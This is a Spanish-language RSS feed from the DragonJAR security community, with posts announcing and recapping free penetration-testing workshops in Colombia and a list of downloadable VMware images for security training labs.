<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Labs DragonJAR &#187; DragoNLab-HackTaller</title>
	<atom:link href="http://labs.dragonjar.org/category/hacktaller/feed" rel="self" type="application/rss+xml" />
	<link>http://labs.dragonjar.org</link>
	<description>Laboratorios de Seguridad Informática: Comunidad DragonJAR</description>
	<lastBuildDate>Sun, 06 Jun 2010 10:34:51 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Registro Fotográfico del HackLab 10 Medellín &#8211; PenTest</title>
		<link>http://labs.dragonjar.org/registro-fotografico-del-hacklab-10-medellin-pentest</link>
		<comments>http://labs.dragonjar.org/registro-fotografico-del-hacklab-10-medellin-pentest#comments</comments>
		<pubDate>Mon, 07 Sep 2009 15:24:56 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Comunidad DragonJAR]]></category>
		<category><![CDATA[Hack Lab]]></category>
		<category><![CDATA[HackLabs]]></category>
		<category><![CDATA[Penetration Testing]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=849</guid>
		<description><![CDATA[Como siempre no queda más que agradecer a tod@s los asistentes de este 10° HackLab realizado en la ciudad de Medellín. Como especifiqué en la invitación, el HackLab se dividió en dos secciones. Una sección dedicada a algunos conceptos de Test de Penetración y una segunda sección dedicada al Test de Pentración como tal, a [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Como siempre no queda más que agradecer a tod@s los asistentes de este 10° HackLab realizado en la ciudad de Medellín.</p>
<p style="text-align: justify;"><img class="aligncenter" title="HackLab 10 - Medellín" src="http://lh3.ggpht.com/_NXAlE1z-EjY/SqUYrpbfz0I/AAAAAAAAAuk/l4AtswoI7Mo/hacklab10.jpg" alt="" width="450" height="220" /></p>
<p style="text-align: justify;">Como especifiqué en la invitación, el HackLab se dividió en dos secciones. Una sección dedicada a algunos conceptos de Test de Penetración y una segunda sección dedicada al Test de Pentración como tal, a un entorno virtualizado de intrusión.</p>
<p style="text-align: justify;">Dejo a continuación el enlace al registro fotográfico del evento.</p>
<p style="text-align: justify;"><a href="http://picasaweb.google.com/4v4t4r/HackLab10Medellin#" target="_blank"><strong>Registro fotográfico del HackLab 10 en Medellín &gt;&gt;</strong></a></p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/registro-fotografico-del-hacklab-10-medellin-pentest/feed</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>HackLab 10 Medellín &#8211; PenTest</title>
		<link>http://labs.dragonjar.org/hacklab-10-medellin-pentest</link>
		<comments>http://labs.dragonjar.org/hacklab-10-medellin-pentest#comments</comments>
		<pubDate>Wed, 02 Sep 2009 07:59:20 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Hack Lab]]></category>
		<category><![CDATA[Medellín]]></category>
		<category><![CDATA[Penetration Testing]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=845</guid>
		<description><![CDATA[Extiendo la invitación a todos los interesados en participar de este 10° HackLab a realizarse en la ciudad de Medellín el próximo sábado 5 de septiembre de 2009. El HackLab será llevado a cabo en dos secciones. Un primera sección cubrirá algunas definiciones de  varias temáticas relacionadas con los Test de Penetración y la segunda [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Extiendo la invitación a todos los interesados en participar de este 10° HackLab a realizarse en la ciudad de Medellín el próximo sábado 5 de septiembre de 2009.</p>
<p style="text-align: justify;">El HackLab será llevado a cabo en dos secciones. Un primera sección cubrirá algunas definiciones de  varias temáticas relacionadas con los Test de Penetración y la segunda sección constrará de una práctica de realización de un PenTest a un sistema virtualizado de intrusión.</p>
<p style="text-align: justify;">El escenario propuesto es el siguiente:</p>
<p style="text-align: justify;">Un empresa dedicada al servicio de Webhosting te contrata para realizar un Test de Penetración en uno de sus servidores dedicados a la administración de sus sistemas. Dicho servidor se encuentra en una de sus  redes xxx.xxx.xxx.xxx. El objetivo consiste en identificar dicho servidor, descubrir y analizar las vulnerabilidades existentes en el mismo y penetrar el sistema.</p>
<p style="text-align: justify;">El proceso de inscripción será igual a los anteriores. Los interesados deben enviarme un correo electrónico solicitando un cupo para el Hack Lab, el proceso de inscripción se completa, luego de que yo responda dicho e-mail confirmándole la disponiblidad del cupo.</p>
<p style="text-align: justify;"><strong>4v4t4r @ gmail . com</strong></p>
<p style="text-align: justify;">Todos las personas que alcancen a tener un cupo deben llevar algunos materiales indispensables para el Test de Penetración.</p>
<p style="text-align: justify;">- <strong>Mekato (más que indispensable&#8230; mejor no vaya si no me lleva mekatos XD)<br />
</strong>- Dispositivo de almacenamiento (preferiblemente superior a 2 gigas)<br />
- Cuaderno de notas<br />
<strong>- Comida para el profesor (papitas, chitos, gudis, rondallas, trocitos, café, etc, etc&#8230;) INDISPENSABLE!!!<br />
</strong>- Muy buena disposición de aprendizaje y enseñanza (pues la idea es retroalimentarnos con experiencias propias).<br />
<strong>- Más mekatos</strong><br />
- Desarrollar y/o visualizar los laboratorios realizados sobre Test de Penetración. Es necesario que vean y comprendan sobre los temas que ya se han tratado, pongo a continuación los videos de los trabajos realizados:</p>
<p style="text-align: justify;">- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-1">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración 1</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-configuracion-de-los-ambientes-virtuales-de-intrusion">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Configuración de los ambientes virtuales de intrusión en Windows</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-configuracion-de-los-ambientes-virtuales-de-intrusion-en-linux">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Configuración de los Ambientes Virtuales de Intrusión en Linux</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-escaneo-e-identificacion-del-sistema">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Escaneo e identificación del Sistema</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-system-hacking">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; System Hacking</a><br />
- <a href="http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-acceso-a-la-informacion-interna">Desarrollo del Laboratorio Virtual &#8211; Test de Penetración &#8211; Acceso a la Información Interna</a></p>
<p style="text-align: justify;"><strong>Fecha:</strong> Sabado 5 de septiembre de 2009<br />
<strong>Hora:</strong> 2:30 pm<br />
<strong>Lugar:</strong> Tecnosoft &#8211; Parque Tecnológico, Boston (antiguo Colegio San José, ahora ITM de Boston) Cr 31 # 54 – 10<br />
<strong>Cupos limitados:</strong> +/- 15 personas</p>
<p style="text-align: justify;"><strong>Repito:</strong> <strong>Solo pueden asistir las personas que confirmen asistencia</strong> (el proceso de confirmación consiste en que me envía la solicitud y yo le confirmo por e-mail la reserva de su cupo), lo hago de esta manera para garantizar de que todos estén cómodos y no tengan que ocupar un equipo por dos personas, o peor aún que vaya y no tenga reserva de cupo.<br />
<strong>Aclaro también y pongo a disposición sobre quienes tengan laptops y quieran llevarlo. Allá le hago el espacio y aprende con todos.</strong> De esta manera tenemos un espacio extra para otro interesado.<br />
Les recuerdo nuevamente que estos HackLabs <strong>NO</strong> tienen ningún costo.</p>
<p style="text-align: justify;">
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/hacklab-10-medellin-pentest/feed</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>Recopilación de Máquinas Virtuales para VMWare Player, WorkStation y Server como entornos de uso para Laboratorios de Seguridad</title>
		<link>http://labs.dragonjar.org/recopilacion-de-maquinas-virtuales-para-vmware-player-workstation-y-server-como-entornos-de-uso-para-laboratorios-de-seguridad</link>
		<comments>http://labs.dragonjar.org/recopilacion-de-maquinas-virtuales-para-vmware-player-workstation-y-server-como-entornos-de-uso-para-laboratorios-de-seguridad#comments</comments>
		<pubDate>Fri, 29 May 2009 19:53:12 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Recursos / Libros / Documentos]]></category>
		<category><![CDATA[Entornos virtualizados]]></category>
		<category><![CDATA[Máquinas Virtuales]]></category>
		<category><![CDATA[Sistemas Operativos]]></category>
		<category><![CDATA[VMWare]]></category>
		<category><![CDATA[VMWare Tools]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=797</guid>
		<description><![CDATA[El siguiente listado de Imágenes de Máquinas Virtuales pretende ser un recopilatorio de  recursos de ambientes virtualizados enfocados al desarrollo de Laboratorios de Seguridad Informática. (PenTesting, Análisis de Malware, Hardening, Protección y Análisis de Datos, etc.) Estas imágenes serán muy útiles cuando se pretendan realizar laboratorios que requieran diferentes Sistemas Operativos como máquinas &#8220;atacantes&#8221;  y [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">El siguiente listado de Imágenes de Máquinas Virtuales pretende ser un recopilatorio de  recursos de ambientes virtualizados enfocados al desarrollo de Laboratorios de Seguridad Informática. (<a href="http://labs.dragonjar.org/tag/penetration-testing" target="_blank">PenTesting</a>, <a href="http://labs.dragonjar.org/tag/analisis-de-malware" target="_blank">Análisis de Malware</a>, <a href="http://labs.dragonjar.org/tag/hardening" target="_blank">Hardening</a>, <a href="http://labs.dragonjar.org/taller-tecnicas-criptograficas-introduccion-y-contenido" target="_blank">Protección y Análisis de Datos</a>, etc.)</p>
<p style="text-align: justify;">Estas imágenes serán muy útiles cuando se pretendan realizar laboratorios que requieran diferentes Sistemas Operativos como máquinas &#8220;atacantes&#8221;  y máquinas &#8220;víctimas&#8221;.</p>
<p style="text-align: justify;">Están desarrolladas para ser utilizadas con cualquiera de los productos de <a href="http://www.vmware.com" target="_blank">VMWare</a>. Recomiendo el uso de <a href="http://www.vmware.com/products/player/" target="_blank">VMWare Player</a> y <a href="http://www.vmware.com/products/server/" target="_blank">Server</a> como solución al tema de licenciamiento, aunque es posible utilizar <a href="http://www.vmware.com/products/ws/" target="_blank">VMWare WorkStation</a> en modo Trial por 30 días. Todas estos entornos ya traen instaladas las <a href="http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-instalacion-de-vmware-tools-en-windows-2003-server" target="_blank">VMWare Tools</a> para facilitar la transferencia de datos entre uno y otro sistema.</p>
<p style="text-align: justify;">Pronto publicaré otras máquinas virtuales para otras soluciones de virtualización (Virtual PC, Qemu, Virtual Box).</p>
<p style="text-align: justify;"><strong>Imágenes tomadas de <a href="http://bagside.com/bagvapp/index.html" target="_blank">BagSide</a>:</strong></p>
<ul style="text-align: justify;">
<li><strong>BackTrack 4 beta (Imágen de VMware con VMWare Tools).</strong>
<ul>
<li>Back|Track 4 beta, with KDE 3.5.10 Desktop and Kernel 2.6.28.1. Now based on Ubuntu Intrepid. Loads of specialized applications for admins. VMwareTools 7.8.4-126130 installed along with SLIM Login manager, some extra scripts and the gtk-qt-engine. Released 11th Feb. 2009. The appliance occupies 4.2GB of the virtual disk which is 25GB in total. Default RAM is set at 688MB and the download is 839 MB. Regarded as one of the top Security distros.</li>
<li><a href="http://www.remote-exploit.org/backtrack.html" target="_blank">Página oficial de BackTrack.</a></li>
<li><a href="http://174.36.1.2/bt4.7z" target="_blank">Descargar máquina virtual.</a></li>
</ul>
</li>
</ul>
<ul style="text-align: justify;">
<li><strong>BackTrack 3 (Imágen de VMware con VMWare Tools).</strong>
<ul>
<li><a href="http://174.36.1.2/bt3.7z" target="_blank">Descargar máquina virtual BackTrack 3.</a></li>
</ul>
</li>
</ul>
<ul style="text-align: justify;">
<li><strong>Caine / Computer Aided INvestigative Environment (Imágen de VMware con VMWare Tools).</strong>
<ul>
<li>CAINE (Computer Aided INvestigative Environment) is a GNU/Linux Digital Forensics distro for Interdepartment Center for Research on Security (CRIS), supported by the University of Modena and Reggio Emilia in Italy. Based on Ubuntu 8.04.1 with Kernel 2.6.24-24 and GNOME 2.22.3. Fully updated on the 2nd of March 2009. Released on the 22nd of Feb. 2009. The dynamic disk is 40GB and the appliance occupies 3.5GB installed and the download is 683 MB. 588 MB RAM is allocated as default.</li>
<li><a href="http://www.caine-live.net/" target="_blank">Página Oficial de Caine.</a></li>
<li><a href="http://174.36.1.2/caine05.7z" target="_blank">Descargar máquina virtual Caine.</a></li>
</ul>
</li>
</ul>
<ul style="text-align: justify;">
<li><strong>Helix 2008R1 (Imágen de VMware con VMWare Tools).</strong>
<ul>
<li>Ubuntu 8.04 based Incident Response. Discovery, Forensics and Security Distro<br />
Kernel 2.6.24-21-generic with Gnome 2.22.3 Desktop. Fully upgraded on the 03/10/2008. The source and some dev-tools are installed as well as VMwareTools 6.5-118166. The resolution is DYNAMIC (drag the VMware frame to desired size). Distro release date 23/09/2008. The appliance occupies 2.8GB of the virtual disk which is 14GB in total. Default RAM is set at 568MB and the download is 708MB in total. Works well here. For those of you who wants to use or try applications like Adepto, Autopsy, GtkHash, Linen, Ophcrack etc.</li>
<li><a href="http://www.e-fense.com/helix/" target="_blank">Página oficial de Helix.</a></li>
<li><a href="http://174.36.1.2/helix.7z" target="_blank">Descargar máquina virtual Helix.</a></li>
</ul>
</li>
</ul>
<ul style="text-align: justify;">
<li><strong>nUbuntu (Imágen de VMware con VMWare Tools).</strong>
<ul>
<li>Ubuntu 8.10 remaster loaded with Security tools for Bluetooth, Cisco, Scanners, Password, Exploits, Database, Fuzzers, Enum, VoiP and Wireless. Some build-tools and VMwareTools 7.8.4-125130 are installed. Release date 17/12/2008. The physical disk is 9GB whereoff 2.7 GB is used for the appliance. The download is 566 MB and RAM set at 548 MB.</li>
<li><a href="http://www.nubuntu.org/" target="_blank">Página oficial de nUbuntu.</a></li>
<li><a href="http://174.36.1.2/nub.7z" target="_blank">Descargar máquina virtual nUbuntu.</a></li>
</ul>
</li>
</ul>
<ul style="text-align: justify;">
<li><strong>Samurai Web Testing Framework (Imágen de VMware con VMWare Tools).</strong>
<ul>
<li>Security and web penetration test suite based on Ubuntu 8.04<br />
Kernel 2.6.24-21-generic with Gnome 2.22.3 Desktop. Fully upgraded on 08/10/2008. Headers and some dev-tools are installed as well as VMwareTools 6.5-118166. The resolution is DYNAMIC (drag the VMware frame to desired size). Distro release date 10/08/1008. The appliance occupies 3.0GB of the virtual disk which is 14GB in total. Default RAM is set at 548MB and the download is 675MB in total. Works well here. Loaded with intrusion tools: DirBuster, Fierce Domain Scanner, Gooscan, Grendel-Scan, HTTP_Print fingerprinting tool, Maltego CE, Nikto, Paros, Rat Proxy, Spike Proxy , SQLBrute, w3af (and the GUI), Wapiti, WebScarab, WebShag, ZenMap, dnswalk, httping, httrack, john the ripper, netcat, nmap, siege, snarf etc.</li>
<li><a href="http://samurai.inguardians.com/" target="_blank">Página oficial de Samurai Web Testing Framework.</a></li>
<li><a href="http://174.36.1.2/samurai.7z" target="_blank">Descargar máquina virtual Samurai Web Testing Framework.</a></li>
</ul>
</li>
</ul>
<ul style="text-align: justify;">
<li><strong>WeakNet Linux (Imágen de VMware con VMWare Tools).</strong>
<ul>
<li>Security distro from WeakNetLabs. Based on Ubuntu 8.04.1 with Kernel 2.6.24-21 and GNOME 2.22.3. Fully updated on the 22nd of November. Released on the 20th of November 2008. Substantial amount of security tools including WeakNetLabs own code and a &#8216;dashboard&#8217; with main applications. The dynamic disk is 20GB and the appliance occupies 3.6GB installed and the download is 848 MB. 612 MB RAM is allocated as default.</li>
<li><a href="http://weaknetlabs.com/linux/" target="_blank">Página oficial de WeakNet Linux.</a></li>
<li><a href="http://174.36.1.2/weaknet.7z" target="_blank">Descargar máquina virtual Weaknet.</a></li>
</ul>
</li>
</ul>
<ul style="text-align: justify;">
<li><strong>CentOS (Imágen de VMware con VMWare Tools).</strong>
<ul>
<li>Red Hat Enterprise based with GNOME 2.16 desktop. Installed kernel-devel, cpp, gcc, build-tools and VMwareTools 7.8.4-126130, Adobe flash plugin, Yum-extender, Yum-utils and gtk-murrine-engine and some iconsets. Release date 31/03/2009. CentOS is ranked no.10 on Distrowatch. The physical disk is 40GB whereoff 4.1 GB i used for the appliance. The download is 813MB. Very mature and stable although not bleeding edge.</li>
<li><a href="http://www.centos.org/" target="_blank">Página oficial de CentOS.</a></li>
<li><a href="http://174.36.1.2/centos52.7z" target="_blank">Descargar máquina virtual CentOS.</a></li>
</ul>
</li>
</ul>
<ul style="text-align: justify;">
<li><strong>FreeBSD (Imágen de VMware con VMWare Tools).</strong>
<ul>
<li>Standard with the following added, Opera 9.63, MySQL Server Client, Ruby, Apache, Ark, compat6, Nano and a few more plus VMwareTools. Occupies 4.5 GB on disk off a virtual dynamic disk of 20 GB. 644 MB RAM allocated and the download is 904 MB. Works here after some serious tweaking and fixing. I must say that I have still problems getting to grips with all BSD&#8217;s as VMware guest OS desktops although this is probably the best one I have built so far.</li>
<li><a href="http://www.freebsd.org/es/" target="_blank">Página oficial de FreeBSD.</a></li>
<li><a href="http://174.36.1.2/freebsd.7z" target="_blank">Descargar máquina virtual FreeBSD.</a></li>
</ul>
</li>
</ul>
<p><strong>Imágenes tomadas de <a href="http://www.vmware.com/appliances/" target="_blank">Virtual Appliance Marketplace</a>:</strong></p>
<ul style="text-align: justify;">
<li><strong>Astaro Mail / Web / Security Gateway </strong><strong>(Imágen de VMware).</strong>
<ul>
<li>Astaro Mail Gateway provides complete protection and control over spam, viruses, worms and Trojans transferred through email. The All-In-One mail security appliance features comprehensive features for spam detection and malware filtering.</li>
<li>Astaro Web Gateway provides complete protection and control over data transferred over the web. The All-In-One web security appliance features Malware Detection, Application Control, URL Filtering and Bandwidth Management, fully integrated and manageable through a single and intuitive browser-based user interface.</li>
<li>Astaro Security Gateway integrates complete Network, Web and Mail Security through an intuitive browser-based user interface. The Astaro Unified Threat Management appliance is the most easy-to-use and cost-effective &#8220;all-in-one&#8221; solution available, working to effectively shield businesses from internet based threats everyday.</li>
<li><a href="http://www.astaro.com/" target="_blank">Página oficial de Astaro Mail Gateway.</a></li>
<li><a href="ftp://ftp.astaro.de/pub/AMG/v7/virtual_appliance/" target="_blank">Descargar Astaro Mail gateway.</a></li>
<li><a href="ftp://ftp.astaro.de/pub/AWG/v7/virtual_appliance/" target="_blank">Descargar Astaro Web Gateway.</a></li>
<li><a href="ftp://ftp.astaro.com/pub/Astaro_Security_Gateway/v7/virtual_appliance/" target="_blank">Astaro Security Gateway.</a></li>
</ul>
</li>
</ul>
<ul style="text-align: justify;">
<li><strong>WiKID Strong Authentication Server Community Edition 3.3.8 </strong><strong>(Imágen de VMware).</strong>
<ul>
<li>The WiKID Strong Authentication System is a dual-source, software-based two-factor authentication system designed to be less expensive and more extensible than hardware tokens.</li>
<li><a href="http://www.wikidsystems.com/support/wikid-support-center/faq/whats-the-difference-between-the-community-release-and-enterprise-release/" target="_blank">Página oficial de WiKID Strong Authentication Server Community Edition.</a></li>
<li><a href="https://sourceforge.net/project/showfiles.php?group_id=144774&amp;package_id=321765" target="_blank">Descargar máquina virtual WiKID Strong Authentication Server Community Edition.</a></li>
</ul>
</li>
</ul>
<ul style="text-align: justify;">
<li><strong>Accellion Secure File Transfer </strong><strong>(Imágen de VMware).</strong>
<ul>
<li>Secure File Transfer Virtual Appliance &#8211; secure, economical and easy to use secure file transfer for today&#8217;s global enterprises.</li>
<li><a href="http://www.accellion.com/" target="_blank">Página oficial de Accellion Secure File Transfer.</a></li>
<li><a href="http://www.accellion.com/virtual-greenex.html" target="_blank">Descargar máquina virtual  Accellion Secure File Transfer.</a></li>
</ul>
</li>
</ul>
<ul style="text-align: justify;">
<li><strong>ShellNET MiniVM </strong><strong>(Imágen de VMware).</strong>
<ul>
<li>Web Interface for managing Nessus Vulnerability Scans and results.</li>
<li><a href="http://turtleshell.net/" target="_blank">Página oficial de ShellNET MiniVM.</a></li>
<li><a href="http://turtleshell.net/index.php?option=com_remository&amp;Itemid=43&amp;func=startdown&amp;id=4" target="_blank">Descargar máquina virtual ShellNET MiniVM.</a></li>
</ul>
</li>
</ul>
<ul style="text-align: justify;">
<li><strong>JanusVM </strong><strong>(Imágen de VMware con VMWare Tools).</strong>
<ul>
<li>Internet Privacy Appliance :: Encrypts your Internet traffic, hides your IP address, and is easy to setup.</li>
<li><a href="http://www.janusvm.com/" target="_blank">Página oficial de<strong> </strong>JanusVM<strong>.</strong></a></li>
<li><a href="http://www.janusvm.com/download.html" target="_blank">Descargar máquina virtual <strong> </strong>JanusVM.</a></li>
</ul>
</li>
</ul>
<ul style="text-align: justify;">
<li><strong>OWASP Live CD (Imágen de VMware con VMWare Tools).</strong>
<ul>
<li>The overarching goal for this project is to make application security tools and documentation easily available. I see this as a great complement to OWASP&#8217;s goal to make application security visible.</li>
<li><a href="http://www.owasp.org/index.php/LiveCD" target="_blank">Página oficial de OWASP Live CD.</a></li>
<li><a href="http://mtesauro.com/files/owasp-livecd-AustinTerrier-Feb2009.vmdk.rar" target="_blank">Descargar máquina virtual de OWASP Live CD.</a></li>
</ul>
</li>
</ul>
<ul style="text-align: justify;">
<li><strong>Fireball ISO Builder </strong><strong>(Imágen de VMware).</strong>
<ul>
<li>Fireball ISO Builder is a VMWare virtual appliance that builds a bootable Gentoo Linux-base ISO image, focused on providing security and networking services to a network. IPv4 and IPv6. go6.net tunnel broker. DHCP, DNS, SSHD services.</li>
<li><a href="http://fireballiso.sourceforge.net/" target="_blank">Página oficial de Fireball ISO Builder.</a></li>
<li><a href="http://sourceforge.net/project/downloading.php?group_id=254850&amp;filename=FireballRelease1.7z" target="_blank">Descargar máquina virtual de Fireball ISO Builder.</a></li>
</ul>
</li>
</ul>
<ul style="text-align: justify;">
<li><strong>Nepenthes VMware Appliance (Imágen de VMware con VMWare Tools).</strong>
<ul>
<li>Nepenthes is a low interaction honeypot like honeyd or mwcollect. Low Interaction Honeypots emulate known vulnerabilities to collect information about potential attacks. Nepenthes is designed to emulate vulnerabilties worms use to spread, and to capture these worms. As there are many possible ways for worms to spread, Nepenthes is modular. There are module interface to Resolve DNS Asynchronous, Emulate Vulnerabilities, Download Files, Submit the Downloaded Files, Trigger Events, Shellcode Handler.</li>
<li><a href="http://www.dalmatech.com/" target="_blank">Página oficial de Nepenthes VMware Appliance.</a></li>
<li><a href="http://www.dalmatech.com/downloads/Nepenthes.20.zip" target="_blank">Descargar máquina virtual Nepenthes.</a></li>
</ul>
</li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/recopilacion-de-maquinas-virtuales-para-vmware-player-workstation-y-server-como-entornos-de-uso-para-laboratorios-de-seguridad/feed</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>Resumen del HackLab de la comunidad realizado en la ciudad de Bucaramanga</title>
		<link>http://labs.dragonjar.org/resumen-del-hacklab-de-la-comunidad-realizado-en-la-ciudad-de-bucaramanga</link>
		<comments>http://labs.dragonjar.org/resumen-del-hacklab-de-la-comunidad-realizado-en-la-ciudad-de-bucaramanga#comments</comments>
		<pubDate>Fri, 29 May 2009 17:12:20 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Bucaramanga]]></category>
		<category><![CDATA[HackLabs]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=793</guid>
		<description><![CDATA[El pasado 23 de mayo se llevó a cabo el primer HackLab: Laboratorio de Hacking / Técnicas y Contramedidas en la ciudad de Bucaramanga. Dicho HackLab contó con la participación de algunos integrantes de la Comunidad e interesados en estas temáticas. El HackLab fue gestionado y dirigido por Angelus_7722 y BadCode, quienes participan activamente en [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">El pasado 23 de mayo se llevó a cabo el primer HackLab: Laboratorio de Hacking / Técnicas y Contramedidas en la ciudad de Bucaramanga. Dicho HackLab contó con la participación de algunos integrantes de la Comunidad e interesados en estas temáticas.</p>
<p style="text-align: justify;"><img class="aligncenter" title="hackLab Bucaramanga" src="http://img11.imageshack.us/img11/5703/hacklabbucara.jpg" alt="" width="500" height="375" /></p>
<p style="text-align: justify;">El HackLab fue gestionado y dirigido por <a href="http://comunidad.dragonjar.org/members/angelus_7722.html" target="_blank"><strong>Angelus_7722</strong></a> y <a href="http://comunidad.dragonjar.org/members/badcode.html" target="_blank"><strong>BadCode</strong></a>, quienes participan activamente en la Comunidad DragonJAR.</p>
<p style="text-align: justify;">A continuación el primer video tutorial de desarrollo de este Laboratorio. En el aprenderemos y conoceremos sobre el entorno utilizado en este laboratorio, y como podemos comenzar con el montaje e importación de las máquinas atacantes y objetivo.</p>
<p style="text-align: justify;"><img class="aligncenter" title="Video" src="http://img25.imageshack.us/img25/1103/videoeum.jpg" alt="" width="500" height="375" /><a href="http://www.4shared.com/file/108576400/30fe4097/HackLab_Bucaramanga_Video_I_DragonJARorg.html" target="_blank"><strong>Descargar video tutorial</strong></a> (<strong>Password:</strong> www.dragonjar.org)</p>
<p style="text-align: justify;">Para más información sobre el desarrollo de este laboratorio y la configuración de los ambientes virtuales visita el <a href="http://comunidad.dragonjar.org/laboratorios/7555-resumen-1er-lab-bucaramanga-practica-1-a.html" target="_blank">foro de resumen&gt;&gt;.</a></p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/resumen-del-hacklab-de-la-comunidad-realizado-en-la-ciudad-de-bucaramanga/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Registro Fotográfico del HackTaller 09 Medellín &#8211; PenTest / BackTrack 4</title>
		<link>http://labs.dragonjar.org/registro-fotografico-del-hacktaller-09-medellin-pentest-backtrack-4</link>
		<comments>http://labs.dragonjar.org/registro-fotografico-del-hacktaller-09-medellin-pentest-backtrack-4#comments</comments>
		<pubDate>Tue, 17 Mar 2009 01:35:51 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Comunidad DragonJAR]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Medellín]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Pentest]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=670</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Como siempre no queda más que agradecer a tod@s los asistentes de este 9° HackTaller realizado en la ciudad de Medellín.</p>
<p style="text-align: center;"><img class="aligncenter" title="HackLab 09 en Medellín" src="http://img16.imageshack.us/img16/5097/hacklab09.jpg" alt="" width="450" height="338" /></p>
<p style="text-align: justify;">Muchas gracias a todos por el mekato que me llevaron&#8230; aunque ya se me acabó XD.</p>
<p style="text-align: justify;"><span id="more-670"></span>Como especifiqué en la invitación, el HackTaller se dividió en dos secciones. Una sección dedicada a algunos conceptos de Test de Penetración y BackTrack 4 y una segunda sección dedicada al Test de Pentración como tal a un entorno virtualizado de intrusión.</p>
<p style="text-align: justify;">Dejo a continuación los enlaces al registro fotográfico del evento.</p>
<p style="text-align: justify;"><a href="http://picasaweb.google.es/4v4t4r/HackLab09EnMedellin" target="_blank"><strong>Registro fotográfico del HackLab 09 en Medellín &gt;&gt;</strong></a></p>
<p style="text-align: justify;"><a href="http://picasaweb.google.es/4v4t4r/HackLab09EnMedellin#slideshow" target="_blank"><strong>Registro fotográfico del HackLab 09 en Medellín en modo presentación &gt;&gt;</strong></a></p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/registro-fotografico-del-hacktaller-09-medellin-pentest-backtrack-4/feed</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>HackTaller 09 Medellín &#8211; PenTest / BackTrack 4</title>
		<link>http://labs.dragonjar.org/hacktaller-09-medellin-pentest-backtrack-4</link>
		<comments>http://labs.dragonjar.org/hacktaller-09-medellin-pentest-backtrack-4#comments</comments>
		<pubDate>Fri, 13 Mar 2009 05:20:13 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Hack Lab]]></category>
		<category><![CDATA[Hacking Ético]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Medellín]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=667</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Extiendo la invitación a todos los interesados en participar de este 9° HackTaller a realizarse en la ciudad de Medellín.</p>
<p style="text-align: justify;">El Hack Lab estará divido en dos secciones. Una primera sección en la cual haré algunos demos de uso y configuración de BackTrack 4 Beta y algunos ejercicios prácticos a desarrollar por cada uno de los participantes.</p>
